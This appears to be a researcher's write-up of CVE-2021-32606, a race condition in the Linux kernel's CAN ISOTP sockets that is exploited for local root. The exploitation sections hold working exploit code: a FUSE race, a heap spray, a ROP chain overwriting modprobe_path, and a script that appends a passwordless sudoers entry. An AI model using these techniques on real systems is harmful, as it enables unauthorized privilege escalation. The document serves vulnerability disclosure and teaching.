# CVE-2021-32606: CAN ISOTP local privilege escalation

This article covers *CVE-2021-32606*, a recent vulnerability in the Linux kernel. The
vulnerable code is the ISOTP protocol in the CAN networking
subsystem. Below, I describe the vulnerability and the exploitation
approach that led to a successful local privilege escalation to root.

## Vulnerability 

The vulnerability is a race condition between `isotp_setsockopt()` and `isotp_bind()` that makes it
possible to modify socket options after the socket has been bound.
With the CAN ISOTP protocol, any non-default socket options
have to be set with `isotp_setsockopt()` before the socket is bound.
Since the introduction of `CAN_ISOTP_SF_BROADCAST` support in commit ``921ca574cd38`` in particular,
socket options must not change after binding, because the socket could then behave differently than
previously expected.

Every ISOTP socket has the following ``struct can_isotp_options`` which can be changed
with `isotp_setsockopt()`.

```c
struct can_isotp_options {
        __u32 flags;            /* set flags for isotp behaviour.       */
	...
```

When an ISOTP socket is about to be bound in `isotp_bind()`, the `flags` are checked for
``CAN_ISOTP_SF_BROADCAST``. If ``CAN_ISOTP_SF_BROADCAST`` is set, no CAN receiver is
registered. A CAN receiver is a callback that runs in software interrupt context in
order to receive incoming CAN messages.

```c
static int isotp_bind(struct socket *sock, struct sockaddr *uaddr, int len)
{
	...
	/* do not register frame reception for functional addressing */
	if (so->opt.flags & CAN_ISOTP_SF_BROADCAST)
		do_rx_reg = 0;
	...
	if (do_rx_reg)
		can_rx_register(net, dev, addr->can_addr.tp.rx_id,
				SINGLE_MASK(addr->can_addr.tp.rx_id),
				isotp_rcv, sk, "isotp", sk);
	...
	so->bound = 1;
	...
```

Above in `isotp_bind()`, we can see that `can_rx_register()` won't be called if
``CAN_ISOTP_SF_BROADCAST`` is set. With `isotp_setsockopt()`, we can either set or clear this flag.

The following excerpt shows `isotp_setsockopt()` from `net/can/isotp.c`:
```c
static int isotp_setsockopt(struct socket *sock, int level, int optname,
			    sockptr_t optval, unsigned int optlen)
{
	struct sock *sk = sock->sk;
	struct isotp_sock *so = isotp_sk(sk);
	int ret = 0;

	if (level != SOL_CAN_ISOTP)
		return -EINVAL;

	if (so->bound)							[1]
		return -EISCONN;

	switch (optname) {
	case CAN_ISOTP_OPTS:
		if (optlen != sizeof(struct can_isotp_options))
			return -EINVAL;

		if (copy_from_sockptr(&so->opt, optval, optlen))	[2]
			return -EFAULT;
		break;
	...
```

If the socket is already bound ``[1]``, the function returns early, as the
socket options of a bound socket must not be modified.
If the socket is not bound, ``struct can_isotp_options`` is copied ``[2]`` from user space.

Now consider the following race condition between `isotp_setsockopt()` and `isotp_bind()`:

- `isotp_setsockopt()` is called and we pass the check at ``[1]`` since the socket is unbound.

- `isotp_bind()` is by default called without ``CAN_ISOTP_SF_BROADCAST``, resulting in the
  registration of a CAN receiver. In the end, ``so->bound`` will be set to ``1``.

- The socket has just been bound, but we are still in `isotp_setsockopt()`. If the timing is right, we now
  overwrite ``struct can_isotp_options`` with `flags` set to ``CAN_ISOTP_SF_BROADCAST``. Notice that the copy
  ``[2]`` happens on an already bound socket.

At this point, we have a socket with a registered CAN receiver, although its newly
set `flags` contain ``CAN_ISOTP_SF_BROADCAST``, a combination that should never occur.

After winning the race, we close the socket, which calls `isotp_release()`.

```c
static int isotp_release(struct socket *sock)
{
	...

	/* remove current filters & unregister */
	if (so->bound && (!(so->opt.flags & CAN_ISOTP_SF_BROADCAST))) {		[1]
		if (so->ifindex) {
			struct net_device *dev;

			dev = dev_get_by_index(net, so->ifindex);
			if (dev) {
				can_rx_unregister(net, dev, so->rxid,		[2]
						  SINGLE_MASK(so->rxid),
						  isotp_rcv, sk);
				dev_put(dev);
			}
		}
	}

	...
```

The check at ``[1]`` ensures that the CAN receiver is only unregistered if `flags` doesn't contain
``CAN_ISOTP_SF_BROADCAST``.
But because we illegally changed `flags` after binding the socket, the kernel now assumes that no
CAN receiver was registered, so none is unregistered.

At this point, the ISOTP socket is closed, but its CAN receiver is still registered.
If another socket sends a message to our previously freed socket, a softirq will call `isotp_rcv()`
on the freed ``struct isotp_sock``, resulting in a **use-after-free**.
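The whole sequence can be replayed in a small user-space model. This is only a sketch of the state transitions described above, not kernel code: `struct model_sock`, the `model_*` functions and `MODEL_SF_BROADCAST` are hypothetical names, and the "receiver" is reduced to a boolean.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define MODEL_SF_BROADCAST 0x800u /* stands in for CAN_ISOTP_SF_BROADCAST */

/* Hypothetical model of the socket state discussed above. */
struct model_sock {
	uint32_t flags;     /* models so->opt.flags */
	bool bound;         /* models so->bound */
	bool rx_registered; /* true while a receiver is registered */
};

/* Models the so->bound check at [1] in isotp_setsockopt(). */
static bool model_setsockopt_check(const struct model_sock *s)
{
	return !s->bound;
}

/* Models the copy at [2]; it does not look at s->bound again. */
static void model_setsockopt_copy(struct model_sock *s, uint32_t new_flags)
{
	s->flags = new_flags;
}

/* Models isotp_bind(): register a receiver unless broadcast is set. */
static void model_bind(struct model_sock *s)
{
	if (!(s->flags & MODEL_SF_BROADCAST))
		s->rx_registered = true;
	s->bound = true;
}

/* Models isotp_release(): the unregister decision re-reads the flags. */
static void model_release(struct model_sock *s)
{
	if (s->bound && !(s->flags & MODEL_SF_BROADCAST))
		s->rx_registered = false;
	s->bound = false;
}

/* Intended order: options first, then bind. Returns true on a leak. */
static bool model_ordered_lifecycle(void)
{
	struct model_sock s = { 0 };

	if (model_setsockopt_check(&s))
		model_setsockopt_copy(&s, MODEL_SF_BROADCAST);
	model_bind(&s);    /* sees the flag, registers nothing */
	model_release(&s);
	return s.rx_registered;
}

/* Racy order: check, bind, late copy, release. Returns true on a leak. */
static bool model_racy_lifecycle(void)
{
	struct model_sock s = { 0 };

	if (!model_setsockopt_check(&s)) /* passes: socket is unbound */
		return false;
	model_bind(&s);                  /* bind wins the race */
	assert(s.bound && s.rx_registered);
	model_setsockopt_copy(&s, MODEL_SF_BROADCAST); /* late copy */
	model_release(&s);               /* skips the unregister */
	return s.rx_registered;
}
```

In this model, `model_ordered_lifecycle()` leaves no receiver behind, while `model_racy_lifecycle()` ends with `rx_registered` still set on a released socket.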

## Exploitation 

In order to allow successful exploitation, the following conditions are required:

- The kernel needs to be built with the config option ``CONFIG_USER_NS`` enabled. This option is needed to
  set up a sandbox for the unprivileged user, which makes it possible to autoload the VCAN and ISOTP modules.
  The former is needed to set up a CAN networking device for our ISOTP sockets, and the latter is
  needed to create those sockets.

- An infoleak is needed in order to bypass KASLR and to get the base address held in the GS register. The
  use of the latter is explained below. In my case, I could trigger a kernel warning that
  prints an Oops-style message to the kernel logs. Kernel logs can be read on
  distributions which haven't restricted access to dmesg via ``CONFIG_SECURITY_DMESG_RESTRICT``.

Exploitation is possible on machines with **SMEP**, **SMAP**, **KASLR** and **KPTI** enabled.

### FUSE technique

For this particular exploit, I originally wanted to use the userfault (`userfaultfd`) technique to reliably
control the race condition. Because userfault has recently been disabled for unprivileged users by default,
I looked for alternatives and came across a technique that *Jann Horn* used in the past to control a
race condition. Since userfault worked so well for so long, this technique has probably not
been used as often, but it is still a good way to make this particular exploit reliable.

One drawback of the FUSE technique is that FUSE might not come preinstalled on some
distributions. On OpenSUSE Tumbleweed with the XFCE desktop, FUSE came preinstalled and was accessible
to unprivileged users.
Repeated tests have shown that there is still a good chance of exploiting this
vulnerability **without** FUSE or userfault, but reliability would likely decrease.

In short, **FUSE** stands for **Filesystem in Userspace** and allows users to mount self-made filesystems in a
user-controlled directory. For this exploit, I used a template filesystem from libfuse called
``hello``, modified for use in this exploit.

The following excerpt shows the `hello_read()` function from the hello filesystem:
```c
static int hello_read(const char *path, char *buf, size_t size, off_t offset,
                struct fuse_file_info *fi)
{
        /* wait inside isotp_setsockopt() */
        sleep(2);						

        int flags = CAN_ISOTP_SF_BROADCAST;
        struct can_isotp_options opts;
        size_t len = sizeof(opts);

        memset(&opts, 0, sizeof(opts));
        opts.flags = flags;

        if (offset < len) {
                if (offset + size > len)
                        size = len - offset;
                /* cast to a byte pointer so that offset counts bytes, not structs */
                memcpy(buf, (char *)&opts + offset, size);
        } else {
                size = 0;
        }

        return size;
}
```
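The offset and size handling of such a read handler can be exercised in isolation. The helper below is a minimal sketch with a hypothetical name (`read_window()`); it is not part of libfuse or of the exploit, it only mirrors the clamping logic and the byte-wise pointer arithmetic a read callback needs.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: copy at most `size` bytes of `src` (which is `len`
 * bytes long), starting at byte `offset`, into `buf`. Returns the number
 * of bytes copied, which is what a read handler would report.
 */
static size_t read_window(char *buf, size_t size, size_t offset,
			  const void *src, size_t len)
{
	assert(buf != NULL && src != NULL);

	if (offset >= len)
		return 0;            /* read starts past the end */
	if (size > len - offset)
		size = len - offset; /* clamp to the remaining bytes */

	/*
	 * Cast to a byte pointer first: adding an offset to a struct
	 * pointer would advance by whole structs, not by bytes.
	 */
	memcpy(buf, (const char *)src + offset, size);
	return size;
}
```

A read that starts inside the object is shortened to the bytes that remain, and a read that starts at or past the end returns 0.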

Any read on the hello filesystem is routed to `hello_read()`.
Inside `hello_read()`, we `sleep()` for 2 seconds, effectively stalling kernel execution at
`copy_from_sockptr()` in `isotp_setsockopt()`:
```c
	if (copy_from_sockptr(&so->opt, optval, optlen))
		return -EFAULT;
```

Meanwhile, `isotp_bind()` finishes and binds the socket, finally setting ``so->bound`` to ``1``.
Only then does `hello_read()` return, and the flags containing ``CAN_ISOTP_SF_BROADCAST`` are copied to kernel space.

```c
void setup_fusefs(void)
{
        fuse_fd = open("mnt/hello", O_RDWR);				       	   [1]
        if (fuse_fd < 0)
                die("failed to open fuse fd");

        fuse_map = mmap(NULL, sizeof(struct can_isotp_options),
				PROT_READ | PROT_WRITE, MAP_SHARED, fuse_fd, 0);   [2]

        if (fuse_map == MAP_FAILED)
                die("failed to map with fuse fs");
}
```

In my exploit, I open a file on the FUSE filesystem ``[1]`` and `mmap()` it ``[2]``, similar to the userfault approach.
This mapping is backed by the previously opened ``fuse_fd``. As already mentioned,
any copy the kernel performs from this mmap'ed memory is served by `hello_read()`.

At this point, we have a properly set up FUSE filesystem which will help us to reliably win the race
condition between `isotp_setsockopt()` and `isotp_bind()`.

What does the **controlled** race condition scenario look like?

- `isotp_setsockopt()` is called on an unbound socket.
	- `copy_from_sockptr()` wants to copy `struct can_isotp_options` from the user space
	- `hello_read()` is called and goes to `sleep()` for 2 seconds, kernel execution is now halted!

- while we are in `setsockopt()`, we **now call** `isotp_bind()`
	- ``CAN_ISOTP_SF_BROADCAST`` flag is **not** set, so a CAN receiver will be registered
	- return from `isotp_bind()`, the socket is now successfully bound

- during the 2 seconds `isotp_setsockopt()` was halted, we expect `isotp_bind()` to be completed
	- `memcpy()` inside `hello_read()` will now copy the struct to kernel space
	- we set the ``CAN_ISOTP_SF_BROADCAST`` flag for a bound socket!
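The steps above can be modelled without threads by treating the user buffer as a lazily backed source: the bytes only exist once a callback has run, and whatever that callback does happens "during" the copy. This is a user-space sketch with hypothetical names (`model_sock`, `fetch_fn`, `fetch_stalled()`), not the exploit itself; `fetch_stalled()` stands in for `hello_read()` sleeping while the other thread binds.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_SF_BROADCAST 0x800u /* stands in for CAN_ISOTP_SF_BROADCAST */

struct model_sock {
	uint32_t flags;
	bool bound;
	bool rx_registered;
};

/* A lazily backed source: the data is produced when fetch is called. */
typedef uint32_t (*fetch_fn)(struct model_sock *s);

/* Models isotp_bind(). */
static void model_bind(struct model_sock *s)
{
	if (!(s->flags & MODEL_SF_BROADCAST))
		s->rx_registered = true;
	s->bound = true;
}

/* Models isotp_setsockopt(): one check up front, then a blocking copy. */
static int model_setsockopt(struct model_sock *s, fetch_fn fetch)
{
	assert(s != NULL && fetch != NULL);

	if (s->bound)
		return -1;   /* -EISCONN in the kernel */
	s->flags = fetch(s); /* the copy stalls until fetch returns */
	return 0;
}

/* Plain memory: nothing else gets to run during the copy. */
static uint32_t fetch_immediate(struct model_sock *s)
{
	(void)s;
	return MODEL_SF_BROADCAST;
}

/* Stand-in for hello_read(): bind completes while the copy is stalled. */
static uint32_t fetch_stalled(struct model_sock *s)
{
	model_bind(s); /* what the second thread does during sleep() */
	return MODEL_SF_BROADCAST;
}
```

With `fetch_immediate()`, a later bind sees the broadcast flag and registers nothing. With `fetch_stalled()`, the socket ends up bound, with a registered receiver, and with the broadcast flag set.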

### Further exploitation

As already mentioned, closing the socket won't unregister the CAN receiver, so every message sent to
the freed socket triggers several use-after-free accesses inside `isotp_rcv()`.

My approach focuses on spraying the freed `struct isotp_sock` so we can reliably pass the
checks in `isotp_rcv()` and call an overwritten function pointer. Because the struct is fairly big
(17432 bytes on my machine) and exceeds the biggest kmalloc cache, `kmalloc-8k`,
it isn't allocated from any of the generic slab caches.
Instead, it is allocated directly by the page allocator.
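As a rough worked example of what this means for the allocation size, the sketch below rounds a request up to a power-of-two number of pages. It assumes 4 KiB pages and the 8 KiB cache limit mentioned above; `model_alloc_order()` is a hypothetical helper, not a kernel function.

```c
#include <assert.h>
#include <stddef.h>

#define MODEL_PAGE_SIZE   4096u /* assumption: 4 KiB pages (x86_64) */
#define MODEL_KMALLOC_MAX 8192u /* largest generic cache named in the text */

/*
 * Returns -1 if `size` still fits a generic kmalloc cache, otherwise the
 * page order (log2 of the page count) of a page-allocator request.
 */
static int model_alloc_order(size_t size)
{
	size_t pages;
	size_t span = 1;
	int order = 0;

	assert(size > 0);
	if (size <= MODEL_KMALLOC_MAX)
		return -1;

	pages = (size + MODEL_PAGE_SIZE - 1) / MODEL_PAGE_SIZE;
	while (span < pages) { /* round up to a power-of-two page count */
		span <<= 1;
		order++;
	}
	return order;
}
```

Under these assumptions, 17432 bytes need 5 pages, which rounds up to 8 pages (order 3, 32768 bytes). A spray buffer of the same size would be rounded the same way, which is what lets it land in the freed pages.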

Looking for a feasible spray primitive, I ended up choosing `setxattr()`. This syscall
has mainly been used in combination with userfault, as `setxattr()` frees the buffer right after copying
it. In fact, we could probably hold the buffer with FUSE, but after repeated tests I noticed that `setxattr()`
alone is also very reliable in this case. The most important property for this approach is that `setxattr()`
does not zero the buffer when freeing it, so the previously copied bytes remain in memory.

Theoretically, some other object could be allocated right after we sprayed the freed socket, but
in practice this does not provoke any crashes, and in the worst case we can simply rerun the exploit
and try again. In the following, I will explain this further.

```c
static void isotp_rcv(struct sk_buff *skb, void *data)
{
	/* Strictly receive only frames with the configured MTU size
	 * => clear separation of CAN2.0 / CAN FD transport channels
	 */
	if (skb->len != so->ll.mtu)							[1]
		return;
	...
	switch (n_pci_type) {
	...
	case N_PCI_SF:
		/* rx path: single frame
		 *
		 * As we do not have a rx.ll_dl configuration, we can only test
		 * if the CAN frames payload length matches the LL_DL == 8
		 * requirements - no matter if it's CAN 2.0 or CAN FD
		 */

		/* get the SF_DL from the N_PCI byte */
		sf_dl = cf->data[ae] & 0x0F;

		if (cf->len <= CAN_MAX_DLEN) {
			isotp_rcv_sf(sk, cf, SF_PCI_SZ4 + ae, skb, sf_dl);		[2]
	...
```

At the beginning of `isotp_rcv()`, the length of the received ``sk_buff`` is checked against ``so->ll.mtu``.
The `skb->len` of the received message is `16` by default, so
``so->ll.mtu`` also has to be `16`. Otherwise, the function returns immediately.
Because we control the whole ``struct isotp_sock`` with the `setxattr()` spray,
we can set ``so->ll.mtu`` to `16`. This is also why this seemingly unreliable spraying approach is
still very reliable: if the spray fails, it's very unlikely that `isotp_rcv()` will read
exactly `16` at the position of ``so->ll.mtu``. For any garbage value other than `16`, we safely
return from `isotp_rcv()` and can try again.

After the initial check ``[1]``, `isotp_rcv_sf()` is called ``[2]`` to receive a so-called CAN
single frame message if the frame length is <= 8.
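To make the two numbers above concrete, here is a small model of a classic CAN frame and of the first payload byte of a single frame. The struct is a simplified stand-in for the kernel's frame layout (field names are illustrative), and it assumes normal addressing, so the PCI byte is `data[0]`.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Simplified model of a classic CAN frame; 16 bytes in total. */
struct model_can_frame {
	uint32_t can_id;  /* identifier plus flag bits */
	uint8_t  len;     /* payload length, 0..8 */
	uint8_t  pad[3];  /* padding / reserved bytes */
	uint8_t  data[8]; /* payload */
};

#define MODEL_N_PCI_SF 0x00u /* single-frame type in the high nibble */

/* Fill `cf` with a single frame carrying `n` payload bytes (n <= 7). */
static void model_build_sf(struct model_can_frame *cf,
			   const uint8_t *payload, uint8_t n)
{
	assert(n <= 7);
	memset(cf, 0, sizeof(*cf));
	cf->data[0] = (uint8_t)(MODEL_N_PCI_SF | n); /* type | SF_DL */
	memcpy(&cf->data[1], payload, n);
	cf->len = (uint8_t)(n + 1);
}

/* High nibble of the PCI byte: the frame type. */
static uint8_t model_pci_type(const struct model_can_frame *cf)
{
	return cf->data[0] & 0xF0;
}

/* Low nibble of the PCI byte: the single-frame data length (SF_DL). */
static uint8_t model_sf_dl(const struct model_can_frame *cf)
{
	return cf->data[0] & 0x0F;
}
```

The model frame is 16 bytes long, matching the default `skb->len`, and a single frame with three payload bytes decodes to type `0x00` with an `SF_DL` of 3.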

```c
static int isotp_rcv_sf(struct sock *sk, struct canfd_frame *cf, int pcilen,
			struct sk_buff *skb, int len)
{
	...
	hrtimer_cancel(&so->rxtimer);							[1]
	so->rx.state = ISOTP_IDLE;
	...
	if ((so->opt.flags & ISOTP_CHECK_PADDING) &&					[2]
	    check_pad(so, cf, pcilen + len, so->opt.rxpad_content)) {
		/* malformed PDU - report 'not a data message' */
		sk->sk_err = EBADMSG;
		if (!sock_flag(sk, SOCK_DEAD))
			sk->sk_error_report(sk);					[3]
		return 1;
	}
```

At ``[1]``, one of the hrtimers is cancelled by calling `hrtimer_cancel()`. I won't cover hrtimers
in detail in this article. All you need to know is that we have to overwrite the freed socket's memory
at ``so->rxtimer.base`` with a valid pointer in order to prevent kernel crashes. ``struct hrtimer`` holds a
pointer to a ``struct hrtimer_clock_base``, which is defined per CPU core.
Fortunately, the `GS` register mentioned above holds the base address of a core's per-CPU data,
and adding a constant offset to this address gives us a valid `struct hrtimer_clock_base`.

After a couple of checks in `hrtimer_cancel()`, the socket's flags are checked ``[2]`` against
``ISOTP_CHECK_PADDING``. These are the same `flags` in which ``CAN_ISOTP_SF_BROADCAST`` is
stored, so we can provide the padding flags needed in `check_pad()` along with it.
The combination of the user-controlled message length and the padding flags causes the message
to be treated as malformed. Accordingly, the socket calls `sk_error_report()` ``[3]`` to report the issue.
Since we control every single byte of ``struct isotp_sock``, we can also
overwrite the `sk_error_report()` pointer. At this point, we have achieved
**arbitrary kernel code execution**.
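As an illustration of how one `flags` word serves both purposes, the sketch below decodes the value `838` that the exploit prints in its output further down, read as hexadecimal (an assumption). The flag values are believed to match `<linux/can/isotp.h>`, but they are restated here under hypothetical `F_*` names and should be checked against your own headers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Assumed values; compare with <linux/can/isotp.h> before relying on them. */
#define F_RX_PADDING    0x008u /* CAN_ISOTP_RX_PADDING */
#define F_CHK_PAD_LEN   0x010u /* CAN_ISOTP_CHK_PAD_LEN */
#define F_CHK_PAD_DATA  0x020u /* CAN_ISOTP_CHK_PAD_DATA */
#define F_SF_BROADCAST  0x800u /* CAN_ISOTP_SF_BROADCAST */
#define F_CHECK_PADDING (F_CHK_PAD_LEN | F_CHK_PAD_DATA)

/* Compose the flag word and confirm it equals the printed value. */
static uint32_t compose_flags(void)
{
	uint32_t f = F_SF_BROADCAST | F_CHECK_PADDING | F_RX_PADDING;

	assert(f == 0x838u);
	return f;
}

/* True if the padding branch in isotp_rcv_sf() would be considered. */
static bool padding_checked(uint32_t flags)
{
	return (flags & F_CHECK_PADDING) != 0;
}

/* True if isotp_release() would skip can_rx_unregister(). */
static bool release_skips_unregister(uint32_t flags)
{
	return (flags & F_SF_BROADCAST) != 0;
}

/* Bits of `flags` that none of the four flags above account for. */
static uint32_t unexplained_bits(uint32_t flags)
{
	return flags & ~(F_SF_BROADCAST | F_CHECK_PADDING | F_RX_PADDING);
}
```

Under these assumptions, `0x838` is fully explained by the broadcast flag plus three padding-related flags, so the same word both suppresses the unregister on release and enables the padding check on receive.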

One may ask where we are supposed to redirect execution. Jumping to invalid places led to a
kernel panic, but then I noticed that the `RDI` register held the address of our freed
``struct isotp_sock``. I decided to perform a stack pivot to this address and start executing ROP gadgets. To
make use of the ROP gadgets found in the vmlinux image, I use the KASLR offset leaked through
the warning in the kernel logs.
When I assembled the ROP chain, I took into account that the space might not be sufficient and that
some important data might eventually be overwritten. Because of that, I almost immediately moved the stack
pointer to the middle of the sprayed object, where no data is used by
`isotp_rcv()`. This is possible because the large size of `struct isotp_sock` makes it
feasible to place the payload inside the object.
In this example, I place my extended ROP chain at offset 0x718.

```c
	/* overwrite sk_error_report() (offset 0x2b8) with stack pivot */
	dst = (uint64_t *)(p + 0x2b8);
	*dst = ROP_PUSH_RDI__JUNK__POP_RSP__RET + kaslr_offset;

	/* ROP at isotp_sock + 0x8 */
	dst = (uint64_t *)(p + 0x8);
	*dst = ROP_RET_0x700 + kaslr_offset;
	dst++;
	/* jump to extended rop chain at isotp_sock + 0x10 */
	*dst = ROP_RET + kaslr_offset;

	/* extended rop chain */
        rop = (uint64_t *)(p + 0x718);
        *rop++ = ROP_POP_RAX__RET + kaslr_offset;
        *rop++ = 0x782f706d742f; /* /tmp/x */
        *rop++ = ROP_POP_RCX__RET + kaslr_offset;
        *rop++ = MODPROBE_PATH + kaslr_offset;
        *rop++ = ROP_MOV_RAX_INTO_RCX__RET + kaslr_offset;
        *rop++ = ROP_POP_RAX__RET + kaslr_offset;
        *rop++ = DO_TASK_DEAD + kaslr_offset;			[1]
        *rop++ = ROP_JMP_RAX + kaslr_offset;
```
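The offset 0x718 follows from the stack arithmetic of the two short gadgets. The sketch below only models how a near `ret` with an optional 16-bit immediate moves the stack pointer on x86-64. It assumes, as the comments in the snippet suggest, that the first gadget is fetched from offset 0x8 of the object; `model_ret()` and `model_chain_start()` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>

/* Effect of `ret imm16`: pop 8 bytes, then skip imm16 more bytes. */
struct ret_effect {
	uint64_t fetched_from; /* offset the return address is read from */
	uint64_t rsp_after;    /* stack pointer offset afterwards */
};

static struct ret_effect model_ret(uint64_t rsp, uint16_t imm)
{
	struct ret_effect e = { rsp, rsp + 8 + imm };

	return e;
}

/*
 * Walk the first two returns and report the offset from which the
 * final plain `ret` reads its target, i.e. where the extended chain
 * has to start.
 */
static uint64_t model_chain_start(uint64_t first_slot, uint16_t skip)
{
	struct ret_effect e;

	e = model_ret(first_slot, 0);     /* pivot's ret loads `ret skip` */
	e = model_ret(e.rsp_after, skip); /* `ret skip` loads plain `ret` */
	assert(e.fetched_from == first_slot + 8);
	return e.rsp_after;
}
```

With the first gadget at 0x8 and a skip of 0x700, the plain `ret` is fetched from 0x10 and the stack pointer ends up at 0x10 + 8 + 0x700 = 0x718.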


The following image shows the sprayed target used to overwrite `struct isotp_sock`:

![alt text](https://github.com/nrb547/kernel-exploitation/blob/main/cve-2021-32606/cve-2021-32606-spray.png "sprayed target")

The ROP chain overwrites `modprobe_path`. Whenever a user tries to execute
a file with an invalid file signature, the kernel runs the program at `modprobe_path` with root privileges.
This technique was apparently used in some CTF challenges and is thoroughly described by *lkmidas*
in his blog. If you want to learn about it in depth, check out his well-written article.
Once `modprobe_path` is overwritten, the hijacked kernel thread is stopped in `do_task_dead()` ``[1]``.
This step is needed because we are done with exploiting the kernel at this point, and any further
execution of the hijacked thread might result in severe kernel crashes.
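The constant `0x782f706d742f` in the chain is simply the string `/tmp/x` packed into a little-endian 64-bit word. A minimal sketch to verify this (with `pack_le64()` as a hypothetical helper name) could look like this:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Pack up to 7 characters into a little-endian 64-bit word, NUL-padded. */
static uint64_t pack_le64(const char *s)
{
	uint64_t v = 0;
	size_t n = strlen(s);
	size_t i;

	assert(n <= 7); /* keep at least one zero byte as terminator */
	for (i = 0; i < n; i++)
		v |= (uint64_t)(unsigned char)s[i] << (8 * i);
	return v;
}
```

Because the string is shorter than eight bytes, the upper bytes of the word stay zero, so a single 8-byte store also writes the terminating NUL.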

```c
ret = system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy;		[1]
	chmod +x /tmp/dummy");
if (ret != 0)
	die("/tmp/dummy creation failed");

ret = system("echo '#!/bin/sh' > /tmp/x; \
	echo 'echo \"noprivs ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers'	[2]
		>> /tmp/x; chmod +x /tmp/x");
if (ret != 0)
	die("/tmp/x creation failed");
```

In short, I create a file ``/tmp/dummy`` ``[1]`` with the invalid signature ``0xff 0xff 0xff 0xff``.
I also create a file ``/tmp/x`` ``[2]``, which is the program the overwritten `modprobe_path` points to. This small
shell script adds the unprivileged user to ``/etc/sudoers``, which allows the user to escalate
privileges to root.

### Combining everything together

At this point, I have covered all of the steps, which now have to be combined.
The following sequence is used in my exploit:

- trigger warning to retrieve kernel addresses from kernel logs

- set up FUSE filesystem and allocate memory with `mmap()`

- set up user namespace to autoload VCAN and ISOTP modules

- set up CAN networking device with VCAN

- open ISOTP socket 1
	- this socket will be exploited with the race condition

- open ISOTP socket 2
	- this socket will only be used to send a CAN message to socket 1

- win race condition on socket 1

- close socket 1

- spray the page allocator with `setxattr()` containing our payload to overwrite socket 1

- send CAN message from socket 2 to socket 1

- `isotp_rcv()` is run as software interrupt for socket 1

- in `isotp_rcv()`, pass checks and call malicious `sk_error_report()` pointer to perform the stack
  pivot

- stack pivot leads to ROP chain execution at `struct isotp_sock`

- execute extended ROP chain, overwrite `modprobe_path`

- try executing `/tmp/dummy`, `/tmp/x` will be executed with root privileges

- the unprivileged user is now added to `/etc/sudoers` and we can now get a **root shell**

Exploit output

```
noprivs@suse:~/expl> uname -a
Linux suse 5.12.0-1-default #1 SMP Mon Apr 26 04:25:46 UTC 2021 (5d43652) x86_64 x86_64 x86_64 GNU/Linux
noprivs@suse:~/expl> ./lpe
[+] entering setsockopt
[+] entering bind
[+] left bind with ret = 0
[+] left setsockopt with flags = 838
[+] race condition hit, closing and spraying socket
[+] sending msg to run softirq with isotp_rcv()
[+] check sudo su for root rights
noprivs@suse:~/expl> sudo su
suse:/home/noprivs/expl # id
uid=0(root) gid=0(root) groups=0(root)
```

## Notice

Researching and exploiting the vulnerability was a great opportunity to expand my knowledge of
the Linux kernel.
I hope you enjoyed the article. If you have further questions, feel free to reach out to me by
e-mail (nslusarek@gmx.net).

Also, I'm currently looking for an internship in infosec in Germany/Europe. In case you are
interested, please reach out to me via e-mail.

## References

https://bugs.chromium.org/p/project-zero/issues/detail?id=808

https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/

https://www.openwall.com/lists/oss-security/2021/05/11/16